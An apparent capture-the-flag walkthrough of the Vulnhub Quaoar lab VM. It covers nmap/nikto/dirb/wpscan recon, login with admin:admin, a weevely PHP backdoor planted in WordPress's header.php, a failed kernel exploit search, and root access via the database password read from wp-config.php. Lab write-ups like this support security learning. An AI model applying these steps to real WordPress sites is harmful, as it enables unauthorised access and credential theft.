Vulnhub Hackfest Quaoar

Recon/enumeration

The most important part. Let’s see what is running on this machine.
I’m going with a pretty aggressive nmap scan.

nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.1.117

vv : Verbose level
Pn : Assume that all hosts are online
A : Tried to find the OS and version
sC : Script command, will do the default script
sS: Syn scan/ half open does not establish the full tcp connection
T 4: Aggressive level
-p-: Means all ports

PORT    STATE SERVICE     REASON         VERSION
53/tcp  open  domain      syn•ack ttl 64 ISC BIND 9.8.1-P1
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        syn-ack ttl 64 Dovecot pop3d
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open  imap        syn•ack ttl 64 Dovecot imapd
995/tcp open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
MAC Address: 08:00:27:5B:4F:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5

We got a web server, so let’s start with that.

[insert quaoar_1_1.png]

It leads to another image but there’s nothing much on it.
Let’s see what nikto has to say about it.

nikto

Let’s run nikto on the website

nikto -h 192.168.1.117
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.117
+ Target Hostname:    192.168.1.117
+ Target Port:        80
+ Start Time:         2017-04-29 17:47:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-04-29 17:48:22 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We got a wordpress installation that’s a good find.
It also found that the robots.txt is visible.

PHP/5.3.10 Apache/2.2.22

dirb

Let’s use dirb with the the common.txt wordlist.
We might find additional interesting directories.

dirb http//192.168.1.117 /usr/share/wordlists/dirb/common.txt

The results are pretty wide. dirb found a wordpress installation, the robots.txt is also visible, the LICENSE is readable.

Interesting urls:

  • /upload/
  • /cgi-bin/
  • /wp-admin/

Investigation the website

After browsing different url, we find ourself on a login page.
We can use the tool wpscan that is made for specially wordpress websites.

wpscan --url 192.168.1.117/wordpress --enumerate u

The enumerate options will enumerate users on the website.
We got two hits, admin and wpuser. Let’s try the obvious passwords.

admin:admin goes through.

Wordpress backend

We’re in, we need to put a backdoor in the website.
We can edit one of the file using Appearance -> Editor.

The header/footer are easy choice because they’re loaded in all the pages.

I’ll be using weevely backdoor.

Weevely the great

Let’s generate a backdoor

weevely generate me.php toor

We open the php file and copy paste it in the header.php

We can now connect to it using the following command.

weevely http://192.168.1.117/wordpress toor

And we have a low privilege shell.

Enumeration

Let’s start with the kernel and OS

uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

cat /etc/lsb-re*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

We got an old kernel and old OS.
Let’s use searchsploit to search for an exploit for the version.

searchsploit 3.2.0 local

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)        | ./linux/local/33589.c

We got at least one those looks like a winner.

Using python i’ll open a http server and do a get request for the file on the
backdoored machine. Once the file is on the server, we’ll compile it with gcc.

Actually the target machine won’t allow us to compile it, so we’ll compile it
on our kali machine then transfer it.

After trying it out, it doesn’t seem to work. After trying most of the exploits
i couldn’t find something that is work.

Wordpress Mysql

The install of wordpress is located at /var/www/wordpress.
We’re looking for the file called wp-config.php. It’s very easy to locate
it. Using either cat/vi/less we look at the content of the file and see that
the username login in the wordpress is called root and there’s a password !

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

Let’s try logging as root using rootpassword! as password.
We’ll initiate a simple ssh connection.

And we’re in. That’s good game.